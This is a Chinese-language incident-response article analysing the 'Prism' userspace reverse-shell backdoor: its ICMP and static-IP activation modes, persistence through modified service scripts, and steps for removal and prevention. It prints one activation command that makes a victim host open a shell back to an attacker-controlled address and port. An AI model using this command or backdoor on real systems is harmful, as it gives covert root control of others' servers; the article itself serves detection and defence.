<dd id="yzu3f"><tr id="yzu3f"><kbd id="yzu3f"></kbd></tr></dd>

              黑基Web安全攻防班
              安基網 首頁 IT技術 安全攻防 查看內容

              追蹤一款 “棱鏡后門木馬”

              2018-9-21 09:18| 投稿: xiaotiger |來自: 互聯網

              摘要: 一款用戶空間隱形反向后門,可跨平臺使用支持在Linux、Solaris、AIX、BSDMac、Android等操作系統,該木馬有兩種不同的激活方式分為:ICMP和STATIC模式;背景介紹近期筆者在處理非法入侵事件中,發現一款用戶空間隱形 ...

              一款用戶空間隱形反向后門,可跨平臺使用支持在Linux、Solaris、AIX、BSDMac、Android等操作系統,該木馬有兩種不同的激活方式分為:ICMP和STATIC模式;

              背景介紹

              近期筆者在處理非法入侵事件中,發現一款用戶空間隱形反向殼后門,該木馬具有較高的隱藏、迷惑性,一般會偽裝成常見的服務名稱,比較難易發現黑客(攻擊者),會修改程序啟動腳本文件,管理員對服務器任何服務進行重啟、停止、啟動等操作時均會運行該木馬;

              木馬介紹

              該木馬是一款用戶空間隱形反向后門,可夸平臺使用支持在Linux、Solaris、AIX、BSD/Mac、Android等操作系統,該木馬有兩種不同的激活方式分為:ICMP和STATIC 模式;

              木馬分析

              1、ICMP模式:此操作模式,后門在后臺靜默等待包含要連接的主機/端口的特定ICMP數據包和用于防止第三方訪問的私鑰;

              注:此模式一般用于服務器或者設備可在外網直接訪問,木馬運行后默認是運行在該模式下,該模式運行后會在系統潛伏下來,等待著被激活,效果展示:圖!

              #激活代碼
              ./sendPacket.py 192.168.3.25 p4ssw0rd 192.168.3.18 6688
              #192.168.3.25 是受害機器運行棱鏡后門
              #p4ssw0rd是關鍵
              #192.168.3.18是攻擊者機器地址
              #6688是攻擊者機器監聽的端口
              

              圖1:攻擊者(服務器控制端)開啟本地監聽端口

              圖2:攻擊者(發起惡意指令服務器)執行木馬激活命令

              圖3:控制受害者服務器

              該木馬的激活方式是通過ICMP協議,也就是大家常用ping命令,現在對比一下常規的ping數據包,和經過改造之后的數據包區別;

              圖1:為常規的ping命令數據包,length 64

              圖2:為改造之后的ping命令數據包,length 192

              2、STATIC模式:此操作模式后門嘗試連接到硬編碼的IP / PORT,在這種情況下,只需控制端運行netcat監聽指定端口,即可獲得服務器管理權限如:圖1(硬編方式)、圖2(控制端監聽端口);

              圖 : 1 (控制者服務器地址,以及監聽端口)

              圖2 (拿到被控服務器端shell)

              圖3(獲得被控端的root權限)

              木馬定位

              該類型木馬是運行用戶空間,一般用于黑客(攻擊者)利用服務器或者項目漏洞獲取服務器root權限后,為了持久控制該服務器的一款木馬,在真實場景黑客(攻擊者)會做多種手段部署,包括但不限于修改服務啟動腳本、sendmail 服務腳本等達到在用戶未知情況下啟動該木馬腳本如:圖1

              清除木馬

              1、臨時停止正常服務,監控此時服務器對外發包的服務于進程,便可以快速定位控制者IP,端口號;

              2、如果是生產環境并不能停止任何服務,那就需要一層層過濾,或者在服務器低峰視排查服務器;

              3、定位出木馬名稱后,對服務器文件內容進行批量搜索,防止在其他服務加入該木馬啟動腳本;

              如何防止

              1、在安全組上關閉非業務的出、入站端口切記出站、出站、出站太多人忽略出站端口;

              2、溯源攻擊者進入服務器方式,進行補丁升級;

              3、使用第三方工具記錄所有的操作日志,以便快速溯源整個攻擊過程;

              4、對服務器的登錄IP地址進行限制,如果不能限制IP,就限制可登入服務器時間;

              5、服務器對外(外網)提供的服務已對應的用戶啟動管理服務器;

              Rootkit

              有人根據此木馬繁衍出,更高級別的控制手段 rookit,具體使用部署方法下一篇文件具體介紹,有興趣的童鞋可以自行研究以下;


              小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

              本文出自:https://www.toutiao.com/a6603100724442169869/

              免責聲明:本文由投稿者轉載自互聯網,版權歸原作者所有,文中所述不代表本站觀點,若有侵權或轉載等不當之處請聯系我們處理,讓我們一起為維護良好的互聯網秩序而努力!聯系方式見網站首頁右下角。


              鮮花

              握手

              雷人

              路過

              雞蛋

              相關閱讀

              最新評論

              最新

              返回頂部
              十一选五奖金对照表